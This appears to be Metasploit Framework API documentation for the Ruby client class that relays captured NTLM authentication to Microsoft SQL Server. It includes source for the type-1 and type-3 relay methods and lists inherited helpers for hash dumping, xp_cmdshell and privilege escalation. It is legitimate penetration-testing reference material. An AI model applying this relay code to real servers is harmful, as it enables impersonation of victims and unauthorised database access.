Class: Msf::Exploit::Remote::SMB::Relay::NTLM::Target::MSSQL::Client

Inherits:

Rex::Proto::MSSQL::Client

• Object
• Rex::Proto::MSSQL::Client
• Msf::Exploit::Remote::SMB::Relay::NTLM::Target::MSSQL::Client

Defined in:

lib/msf/core/exploit/remote/smb/relay/ntlm/target/mssql/client.rb

Constant Summary

Constants included from Rex::Proto::MSSQL::ClientMixin

Rex::Proto::MSSQL::ClientMixin::ENCRYPT_NOT_SUP, Rex::Proto::MSSQL::ClientMixin::ENCRYPT_OFF, Rex::Proto::MSSQL::ClientMixin::ENCRYPT_ON, Rex::Proto::MSSQL::ClientMixin::ENCRYPT_REQ, Rex::Proto::MSSQL::ClientMixin::STATUS_END_OF_MESSAGE, Rex::Proto::MSSQL::ClientMixin::STATUS_IGNORE_EVENT, Rex::Proto::MSSQL::ClientMixin::STATUS_NORMAL, Rex::Proto::MSSQL::ClientMixin::STATUS_RESETCONNECTION, Rex::Proto::MSSQL::ClientMixin::STATUS_RESETCONNECTIONSKIPTRAN, Rex::Proto::MSSQL::ClientMixin::TYPE_ATTENTION_SIGNAL, Rex::Proto::MSSQL::ClientMixin::TYPE_BULK_LOAD, Rex::Proto::MSSQL::ClientMixin::TYPE_PRE_LOGIN_MESSAGE, Rex::Proto::MSSQL::ClientMixin::TYPE_PRE_TDS7_LOGIN, Rex::Proto::MSSQL::ClientMixin::TYPE_RPC, Rex::Proto::MSSQL::ClientMixin::TYPE_SQL_BATCH, Rex::Proto::MSSQL::ClientMixin::TYPE_SSPI_MESSAGE, Rex::Proto::MSSQL::ClientMixin::TYPE_TABLE_RESPONSE, Rex::Proto::MSSQL::ClientMixin::TYPE_TDS7_LOGIN, Rex::Proto::MSSQL::ClientMixin::TYPE_TRANSACTION_MANAGER_REQUEST

Instance Attribute Summary

• #logger ⇒ Object readonly protected

  Returns the value of attribute logger.

• #target ⇒ Object readonly

  Returns the value of attribute target.

Attributes inherited from Rex::Proto::MSSQL::Client

#auth, #connection_timeout, #current_database, #framework, #framework_module, #initial_connection_info, #max_send_size, #proxies, #send_delay, #send_lm, #send_ntlm, #send_spn, #sock, #ssl, #ssl_cipher, #ssl_verify_mode, #ssl_version, #sslkeylogfile, #tdsencryption, #use_lmkey, #use_ntlm2_session, #use_ntlmv2

Attributes included from Udp

#udp_sock

Attributes included from Metasploit::Framework::Tcp::Client

#max_send_size, #send_delay, #sock

Class Method Summary

• .create(provider, target, logger, timeout, framework_module:) ⇒ Object

Instance Method Summary

• #initialize(framework_module, proxies = nil, provider: nil, target: nil, logger: nil, timeout: 30) ⇒ Client constructor

  A new instance of Client.

• #relay_ntlmssp_type1(client_type1_msg) ⇒ Object
• #relay_ntlmssp_type3(client_type3_msg) ⇒ Object

Methods inherited from Rex::Proto::MSSQL::Client

#chost, #connect, #cport, #detect_platform_and_arch, #initial_info_for_envchange, #map_compile_arch_to_architecture, #map_compile_os_to_platform, #mssql_login, #mssql_prelogin, #mssql_upload_exec, #peerhost, #peerinfo, #peerport, #powershell_upload_exec, #query, #rhost, #rport

Methods included from Kerberos::ServiceAuthenticator::Options

#kerberos_auth_options

Methods included from Kerberos::Ticket::Storage

#kerberos_storage_options, #kerberos_ticket_storage, store_ccache

Methods included from Udp

#chost, #cleanup, #connect_udp, #cport, #deregister_udp_options, #disconnect_udp, #handler, #lhost, #lport, #rhost, #rport

Methods included from MSSQL_COMMANDS

#mssql_2k5_password_hashes, #mssql_2k_password_hashes, #mssql_current_user_escalation, #mssql_db_names, #mssql_enumerate_servername, #mssql_is_sysadmin, #mssql_rdp_enable, #mssql_rebuild_xpcmdshell, #mssql_sa_escalation, #mssql_sql_info, #mssql_sql_xpcmdshell_disable_2000, #mssql_xpcmdshell_disable, #mssql_xpcmdshell_enable, #mssql_xpcmdshell_enable_2000

Methods included from Rex::Proto::MSSQL::ClientMixin

#mssql_parse_done, #mssql_parse_env, #mssql_parse_error, #mssql_parse_info, #mssql_parse_login_ack, #mssql_parse_reply, #mssql_parse_ret, #mssql_parse_tds_reply, #mssql_parse_tds_row, #mssql_prelogin_packet, #mssql_print_reply, #mssql_send_recv, #mssql_xpcmdshell, #parse_prelogin_response

Methods included from Module::UI::Message

#print_error, #print_good, #print_prefix, #print_status, #print_warning

Methods included from Module::UI::Message::Verbose

#vprint_error, #vprint_good, #vprint_status, #vprint_warning

Methods included from Metasploit::Framework::Tcp::Client

#chost, #connect, #cport, #disconnect, #proxies, #rhost, #rport, #set_tcp_evasions, #ssl, #ssl_version

Constructor Details

#initialize(framework_module, proxies = nil, provider: nil, target: nil, logger: nil, timeout: 30) ⇒ Client

Returns a new instance of Client.

# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/mssql/client.rb', line 5

def initialize(framework_module, proxies = nil, provider: nil, target: nil, logger: nil, timeout: 30)
  @logger = logger
  @provider = provider
  @target = target
  @timeout = timeout
  super(framework_module, framework_module.framework, target.ip, target.port, proxies)
end

Instance Attribute Details

#logger ⇒ Object (readonly, protected)

Returns the value of attribute logger.

# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/mssql/client.rb', line 81

def logger
  @logger
end

#target ⇒ Object (readonly)

Returns the value of attribute target.

# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/mssql/client.rb', line 3

def target
  @target
end

Class Method Details

.create(provider, target, logger, timeout, framework_module:) ⇒ Object

# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/mssql/client.rb', line 13

def self.create(provider, target, logger, timeout, framework_module:)
  new(
    framework_module,
    provider: provider,
    target: target,
    logger: logger,
    timeout: timeout
  )
end

Instance Method Details

#relay_ntlmssp_type1(client_type1_msg) ⇒ Object

Parameters:

• client_type1_msg (String)

# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/mssql/client.rb', line 26

def relay_ntlmssp_type1(client_type1_msg)
  self.initial_connection_info[:prelogin_data] = mssql_prelogin

  pkt_hdr = MsTdsHeader.new(
    packet_type: MsTdsType::TDS7_LOGIN,
    packet_id: 1
  )

  pkt_body = MsTdsLogin7.new(
    option_flags_2: {
      f_int_security: 1
    },
    server_name: @target.ip
  )

  pkt_body.sspi = client_type1_msg.bytes

  pkt_hdr.packet_length += pkt_body.num_bytes
  pkt = pkt_hdr.to_binary_s + pkt_body.to_binary_s

  @mstds_channel.starttls if tdsencryption

  resp = mssql_send_recv(pkt, @timeout, false)
  server_type2_message = resp[3..-1]

  Msf::Exploit::Remote::SMB::Relay::NTLM::Target::RelayResult.new(
    message: Net::NTLM::Message.parse(server_type2_message),
    nt_status: WindowsError::NTStatus::STATUS_MORE_PROCESSING_REQUIRED
  )
end

#relay_ntlmssp_type3(client_type3_msg) ⇒ Object

Parameters:

• client_type3_msg (String)

# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/mssql/client.rb', line 59

def relay_ntlmssp_type3(client_type3_msg)
  pkt_hdr = MsTdsHeader.new(
    type: MsTdsType::SSPI_MESSAGE,
    packet_id: 1
  )

  pkt_hdr.packet_length += client_type3_msg.length
  pkt = pkt_hdr.to_binary_s + client_type3_msg

  resp = mssql_send_recv(pkt)
  info = mssql_parse_reply(resp)
  if info[:login_ack]
    nt_status = WindowsError::NTStatus::STATUS_SUCCESS
  else
    nt_status = WindowsError::NTStatus::STATUS_LOGON_FAILURE
  end

  Msf::Exploit::Remote::SMB::Relay::NTLM::Target::RelayResult.new(nt_status: nt_status)
end